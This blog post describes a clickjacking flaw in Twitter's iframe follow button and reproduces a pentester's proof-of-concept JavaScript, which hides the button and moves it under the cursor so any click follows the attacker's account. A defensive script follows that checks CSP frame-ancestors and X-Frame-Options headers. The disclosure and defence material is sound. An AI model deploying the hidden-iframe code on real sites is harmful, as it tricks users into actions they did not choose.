June 01
A new follow button that lets a visitor instantly follow a user is now available. The particularity of this new button (like the Google +1 button) is that the user does not need to visit the Twitter.com website: everything is handled inside an iframe.
A French pentester released a POC (proof of concept) of the vulnerability.
Here is how it works:
- You make the iframe fully transparent/invisible via CSS.
- You capture the mouse events.
- When the user moves the mouse, you move the Twitter button iframe so that it always stays under the cursor.
- If the user clicks anywhere on your page, they automatically follow your account.
Here is the code:
```javascript
// Fallback for browsers without getElementsByClassName (e.g. IE7):
// returns the first element whose class attribute equals classname
if (!document.getElementsByClassName) {
    document.getElementsByClassName = function (classname) {
        var all = document.getElementsByTagName("*");
        for (var i = 0; i < all.length; i++) {
            if (all.item(i).className == classname) {
                return new Array(all.item(i));
            }
        }
    };
}
// The embedded follow-button iframe, taken out of the page flow and made near-transparent
var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)'; // IE equivalent of opacity
// Reposition the iframe on every mouse move so it stays under the cursor
document.onmousemove = function (e) {
    if (!e) e = window.event;
    twitterFollowIframe.style.left = e.clientX - 20;
    twitterFollowIframe.style.top = e.clientY - 10;
};
```
You can find the proof of concept at this page: http://serphacker.com/twitter-follow-clickjacking.html
The destination server is down at the moment, so here is the text of the POC page, with the button at 20% opacity:
SERP Hacker
Tested on Firefox 3 and IE7
Follow SERP Hacker
Just move the mouse and click somewhere; you will automatically follow my Twitter account if you are already logged in to Twitter. Remember, we can make the button totally hidden by setting opacity to 0.
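The attack above only works because the page carrying the button can be loaded inside a frame on a third-party site. The defender's check for that property is to look at the response headers: a `Content-Security-Policy` with a `frame-ancestors` directive, or failing that an `X-Frame-Options` header, decides who may frame the page. The following script is an added example written for this post, not code from the original article or from Twitter; the header sets it evaluates are constructed samples, and the classification labels (`denied`, `same-origin`, `restricted`, `frameable`) are names chosen here. It implements the precedence browsers apply, where `frame-ancestors` wins over `X-Frame-Options` when both are present.

```javascript
// Added example (not from the original post): classify whether an HTTP response
// allows the page to be embedded in a frame by another site, based on its
// Content-Security-Policy frame-ancestors and X-Frame-Options headers.

// Extract the source list of the frame-ancestors directive, or null if absent.
function parseFrameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const parts = directive.trim().split(/\s+/).filter(Boolean);
    if (parts.length && parts[0].toLowerCase() === 'frame-ancestors') {
      return parts.slice(1).map(s => s.toLowerCase());
    }
  }
  return null;
}

// Return one of: 'denied', 'same-origin', 'restricted', 'frameable'.
function framingPolicy(headers) {
  // Header names are case-insensitive; normalise them before lookup.
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;

  // Browsers that understand frame-ancestors ignore X-Frame-Options when both are set.
  const ancestors = parseFrameAncestors(h['content-security-policy']);
  if (ancestors) {
    // An empty source list matches nothing, so framing is blocked everywhere.
    if (ancestors.length === 0 || ancestors.includes("'none'")) return 'denied';
    if (ancestors.includes('*')) return 'frameable';
    if (ancestors.every(a => a === "'self'")) return 'same-origin';
    return 'restricted'; // only the listed origins may frame the page
  }

  const xfo = (h['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny') return 'denied';
  if (xfo === 'sameorigin') return 'same-origin';
  if (xfo.startsWith('allow-from')) return 'restricted'; // legacy, not honoured by all browsers
  return 'frameable'; // no anti-framing header at all: clickjacking is possible
}

// Constructed sample responses, keyed by a label, for a quick audit report.
const SAMPLE_RESPONSES = {
  unprotected: { 'Content-Type': 'text/html' },
  xfo_deny: { 'X-Frame-Options': 'DENY' },
  csp_none: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  csp_overrides_xfo: {
    'Content-Security-Policy': "frame-ancestors 'self' https://partner.example",
    'X-Frame-Options': 'DENY',
  },
};

// Build a { label: policy } report over a set of responses.
function auditFraming(responses) {
  const report = {};
  for (const [label, headers] of Object.entries(responses)) {
    report[label] = framingPolicy(headers);
  }
  return report;
}

console.log(auditFraming(SAMPLE_RESPONSES));
```

Note the design choice in `csp_overrides_xfo`: the `X-Frame-Options: DENY` is reported as `restricted`, not `denied`, because a modern browser applies the CSP directive and never consults the older header, so the effective policy is the weaker one. A widget that is meant to be embedded cross-site cannot use these headers at all, which is why a frameable button must never perform a state-changing action on a single unconfirmed click.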
